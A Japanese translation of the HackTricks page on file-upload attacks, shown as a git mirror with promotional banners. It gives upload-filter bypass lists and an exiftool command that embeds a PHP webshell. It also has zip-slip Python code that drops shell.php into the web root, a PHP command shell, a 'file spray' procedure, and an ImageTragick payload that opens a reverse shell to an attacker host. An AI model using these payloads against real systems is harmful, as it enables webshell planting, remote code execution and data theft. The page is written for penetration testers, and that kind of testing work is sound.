Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 09:27:32 +00:00

Translator workflow e90c803209 Translated to Japanese

2023-07-07 23:42:27 +00:00

21 KiB

Raw Blame History

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
公式のPEASS＆HackTricksのグッズを手に入れましょう。
💬 Discordグループまたはtelegramグループに参加するか、Twitterで🐦@carlospolopmをフォローしてください。
ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出してください。

ファイルのアップロード一般的な手法

ダブル拡張子を持つファイルをアップロードしてみてください（例：file.png.php_または_file.png.php5）。

PHPの拡張子：.php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
ASPの拡張子：.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .asp, .cer, .shtml

拡張子の一部を大文字にしてみてください。例：.pHp, .pHP5, .PhAr ...
ダブル（またはそれ以上の）拡張子をアップロードしてみてください（特定の拡張子が存在するかどうかをテストするミス構成のチェックをバイパスするのに役立ちます）：
file.png.php
file.png.txt.php
逆ダブル拡張子をアップロードしてみてください（Apacheのミス構成を悪用するのに役立ちます。拡張子_.php_である必要はありませんが、コードが実行されます）：

例：file.php.png

ヌル文字を使用したダブル拡張子：
例：file.php%00.png
拡張子の末尾に特殊文字を追加してください：％00, ％20, （いくつかのドット）....
file.php%00
file.php%20
file.php...... --> Windowsでは、ファイルが末尾にドットで作成されると、それらは削除されます（.phpとしての拡張子をチェックするフィルタをバイパスできます）
file.php/
_file.php._
Content-Typeヘッダの値を設定することで、Content-Typeのチェックをバイパスしてください：image/png、text/plain、application/octet-stream
マジックナンバーチェックをバイパスするために、ファイルの先頭に実際の画像のバイトを追加してください（_file_コマンドを混乱させます）。または、シェルをメタデータに挿入します：exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
ファイル内のどこにでもそれらを設定できるため、マジックバイトがファイルでチェックされている可能性もあります。
WindowsのNTFS代替データストリーム（ADS）を使用します。この場合、禁止された拡張子の後ろにコロン文字「:」が挿入されます。その結果、サーバー上に禁止された拡張子の空のファイルが作成されます（例：「file.asax:.jpg」）。このファイルは、その後他のテクニックを使用して編集することもできます。たとえば、その短いファイル名を使用することです。また、「::$data」パターンを使用して空でないファイルを作成することもできます。したがって、このパターンの後にドット文字を追加することも、さらなる制限をバイパスするのに役立つ場合があります（例：「file.asp::$data.」）。
許可された拡張子（png）でバックドアをアップロードし、バックドアが実行されるミス構成を祈ります。
既にアップロードされたファイルをリネームする脆弱性を見つけます（拡張子を変更するため）。
ローカルファイルインクルージョンの脆弱性を見つけてバックドアを実行します。
可能な情報漏洩：
同じ名前の同じファイルを複数回（同時に）アップロードします。
既に存在するファイルまたはフォルダの名前を持つファイルをアップロードします。
**“.”、“..”、“…”**を名前とするファイルをアップロードします。たとえば、WindowsのApacheでは、アプリケーションがアップロードされたファイルを「/www/uploads/」ディレクトリに保存する場合、「.」のファイル名は「/www/」ディレクトリに「uploads」という名前のファイルを作成します。
NTFSで削除が容易でないファイルをアップロードします。例：「…:.jpg」（Windows）
名前に|<>*?”などの無効な文字を含むWindowsでのファイルのアップロード（Windows）
CON、PRN、AUX、NUL、COM1、COM2、COM3、COM4、COM5、COM6、COM7、COM8、COM9、LPT1、LPT2、LPT3、LPT4、LPT5、LPT6、LPT7、LPT8、LPT9などの予約済み（禁止）名を使用してWindowsにファイルをアップロードします。

また、誤って .pharファイルは、Javaの.jarに似ていますが、PHP用であり、PHPファイルのように使用できます（PHPで実行するか、スクリプト内に含めるなど）。

.inc拡張子は、ファイルのインポートにのみ使用されることがありますので、ある時点で、誰かがこの拡張子を実行できるように許可している可能性があります。

BurpSuitプラグインを使用して、多くの可能なファイルアップロードの脆弱性をチェックしてください：https://github.com/modzero/mod0BurpUploadScanner または、アップロード可能なファイルを見つけ、コードを実行するためのさまざまなトリックを試すコンソールアプリケーションを使用してください：https://github.com/almandin/fuxploider

wgetファイルアップロード/SSRFトリック

場合によっては、サーバーが**wgetを使用してファイルをダウンロードしており、URLを指定できることがあります。これらの場合、コードはダウンロードされるファイルの拡張子がホワイトリスト内にあることを確認して、許可されたファイルのみがダウンロードされるようにします。ただし、このチェックはバイパスできます。 Linuxでのファイル名の最大長さは255ですが、wgetはファイル名を236文字に切り詰めます。"A"*232+".php"+".gif"という名前のファイルをダウンロードできます。このファイル名は、この例では".gif"が有効な拡張子であるため、チェックをバイパスしますが、wgetはファイルを"A"*232+".php"にリネーム**します。

#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080

#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s

2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]

注意してください。このチェックをバイパスするために考えている別のオプションは、HTTPサーバーを別のファイルにリダイレクトさせることです。そのため、初期のURLはチェックをバイパスしますが、wgetは新しい名前でリダイレクトされたファイルをダウンロードします。これは、wgetがパラメータ--trust-server-namesと一緒に使用されている場合を除いては機能しません。なぜなら、wgetはリダイレクトされたページを元のURLで指定されたファイル名でダウンロードするからです。

ファイルアップロードから他の脆弱性へ

ファイル名を../../../tmp/lol.pngに設定し、パストラバーサルを試みる
ファイル名をsleep(10)-- -.jpgに設定し、SQLインジェクションを達成することができるかもしれません
ファイル名を<svg onload=alert(document.comain)>に設定して、XSSを達成する
ファイル名を; sleep 10;に設定して、いくつかのコマンドインジェクションをテストする（詳細はこちら）
画像（svg）ファイルのアップロードにおけるXSS
JSファイルのアップロード+XSS = Service Workersの悪用
svgアップロードにおけるXXE
svgファイルのアップロードによるオープンリダイレクト
有名なImageTrick脆弱性
ウェブサーバーに画像を取得させることができる場合、SSRFを悪用することができます。この画像がいくつかの公開サイトに保存される場合、https://iplogger.org/invisible/からのURLを指定して、すべての訪問者の情報を盗むこともできます。

以下は、アップロードによって達成できるトップ10のことです（リンクから）：

ASP / ASPX / PHP5 / PHP / PHP3：Webシェル / RCE
SVG：格納型XSS / SSRF / XXE
GIF：格納型XSS / SSRF
CSV：CSVインジェクション
XML：XXE
AVI：LFI / SSRF
HTML / JS：HTMLインジェクション / XSS / オープンリダイレクト
PNG / JPEG：ピクセルフラッド攻撃（DoS）
ZIP：LFI経由のRCE / DoS
PDF / PPTX：SSRF / BLIND XXE

ZIPファイルの自動解凍アップロード

サーバー内で解凍されるZIPをアップロードできる場合、2つのことができます：

シンボリックリンク

他のファイルへのシンボリックリンクを含むリンクをアップロードし、解凍されたファイルにアクセスすることで、リンクされたファイルにアクセスできます：

ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt

異なるフォルダで解凍する

解凍されたファイルは予期しないフォルダに作成されます。

OSレベルのコマンド実行から悪意のあるファイルのアップロードを保護するために、この設定が有効であると簡単に想像することができますが、残念ながらこれは真実ではありません。ZIPアーカイブ形式は階層的な圧縮をサポートしており、さらに上位のディレクトリを参照することもできるため、対象アプリケーションの解凍機能を悪用することで安全なアップロードディレクトリから脱出することができます。

この種のファイルを作成するための自動化されたエクスプロイトは、こちらで見つけることができます: https://github.com/ptoomey3/evilarc

python evilarc.py -o unix -d 5 -p /var/www/html/ rev.php

以下は、悪意のあるzipファイルを作成するためのPythonコードです。

import zipfile

# Create a new zip file
zip_file = zipfile.ZipFile('malicious.zip', 'w')

# Add a file to the zip
zip_file.write('payload.txt')

# Add a malicious file to the zip
zip_file.writestr('../path/to/evil.txt', 'This file is malicious!')

# Close the zip file
zip_file.close()

このPythonコードは、malicious.zipという名前の新しいzipファイルを作成し、payload.txtというファイルを追加します。さらに、../path/to/evil.txtという悪意のあるファイルもzipに追加します。最後に、zipファイルを閉じます。

#!/usr/bin/python
import zipfile
from cStringIO import StringIO

def create_zip():
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()

create_zip()

リモートコマンド実行を達成するために、以下の手順を実行しました：

PHPシェルを作成します：

<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>

「ファイルスプレー」と呼ばれる手法を使用し、圧縮されたzipファイルを作成します:

root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# ls *.php
simple-backdoor.php  xxAxxAxxAcmd.php        xxAxxAxxAxxAxxAxxAcmd.php        xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAcmd.php           xxAxxAxxAxxAcmd.php     xxAxxAxxAxxAxxAxxAxxAcmd.php     xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAxxAcmd.php        xxAxxAxxAxxAxxAcmd.php  xxAxxAxxAxxAxxAxxAxxAxxAcmd.php
root@s2crew:/tmp# zip cmd.zip xx*.php
adding: xxAcmd.php (deflated 40%)
adding: xxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
root@s2crew:/tmp#

ヘックスエディタまたはviを使用して、「xxA」を「../」に変更します。私はviを使用しました：

:set modifiable
:%s/xxA/..\//g
:x!

完了！

あと一つのステップが残っています：ZIPファイルをアップロードし、アプリケーションに解凍させます！成功すれば、ウェブサーバーに十分な権限があれば、システム上に簡単なOSコマンド実行シェルが存在します：

参考: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/

ImageTragic

このコンテンツを画像拡張子でアップロードして、脆弱性 (ImageMagick , 7.0.1-1) を悪用します

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

PGNにPHPシェルを埋め込む

IDATチャンクにウェブシェルを配置する主な理由は、リサイズおよび再サンプリング操作をバイパスできるためです。PHP-GDには、これを行うための2つの関数、imagecopyresizedおよびimagecopyresampledが含まれています。

この投稿を読んでください：https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

ポリグロットファイル

セキュリティの文脈でのポリグロットとは、複数の異なるファイルタイプの有効な形式であるファイルのことを指します。例えば、GIFARはGIFファイルとRARファイルの両方です。また、GIFとJSの両方、PPTとJSの両方など、複数のファイルタイプであるファイルも存在します。

ポリグロットファイルは、ファイルタイプに基づく保護をバイパスするためによく使用されます。ユーザーが危険なファイル（JSファイル、PHPファイル、Pharファイルなど）をアップロードすることを防ぐために、多くのアプリケーションは特定のタイプ（JPEG、GIF、DOCなど）のみのアップロードを許可します。

これにより、複数の異なる形式のフォーマットに準拠したファイルをアップロードできます。JPEGのように見えるが、実際にはPHARファイル（PHp ARchive）であるファイルをアップロードすることができますが、有効な拡張子が必要であり、アップロード機能が許可しない場合は役に立ちません。

詳細はこちら：https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a